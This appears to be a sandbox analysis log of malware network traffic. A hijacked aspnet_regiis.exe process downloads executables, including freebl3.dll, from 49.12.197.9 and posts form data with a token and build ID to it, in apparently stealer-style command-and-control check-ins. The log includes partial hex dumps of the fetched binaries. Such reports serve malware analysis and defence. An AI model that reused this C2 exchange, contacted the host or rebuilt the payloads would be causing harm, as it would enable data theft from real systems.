                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:53 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:53 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 2459136
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:26:53 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:26:53 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                            Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                            Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                                                                                                            Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                                                                                                            Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                            Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                            Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                                                                                                            Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                                                                                                            Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                                                                                            2024-10-03 01:26:53 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                                                                                                            Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.94971949.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:56 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 829
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:56 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------KKKEBKJJDGHCBGCAAKEHCont
                                                                                                                                                                            2024-10-03 01:26:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:57 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:57 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.94972049.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:57 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:57 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------HCGCBFHCFCFBFIEBGHJECont
                                                                                                                                                                            2024-10-03 01:26:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:26:58 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:26:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            10192.168.2.94972149.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:26:59 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKK
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Content-Length: 437
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:26:59 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 39 31 39 62 62 38 31 37 64 31 36 65 66 66 35 65 64 35 30 34 31 66 31 39 32 33 65 33 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 37 34 65 66 30 64 38 63 65 35 36 65 34 39 34 62 30 64 38 33 65 31 64 35 62 65 39 64 62 65 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                            Data Ascii: ------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="token"7919bb817d16eff5ed5041f1923e3db3------GDBKKFHIEGDHJKECAAKKContent-Disposition: form-data; name="build_id"b74ef0d8ce56e494b0d83e1d5be9dbeb------GDBKKFHIEGDHJKECAAKKCont
                                                                                                                                                                            2024-10-03 01:27:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:00 GMT
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-10-03 01:27:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            11192.168.2.94972249.12.197.94431420C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-03 01:27:01 UTC195OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                            Host: 49.12.197.9
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            2024-10-03 01:27:01 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Thu, 03 Oct 2024 01:27:01 GMT
                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Last-Modified: Thursday, 03-Oct-2024 01:27:01 GMT
                                                                                                                                                                            Cache-Control: no-store, no-cache
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-03 01:27:01 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                            Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                            2024-10-03 01:27:01 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                            Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
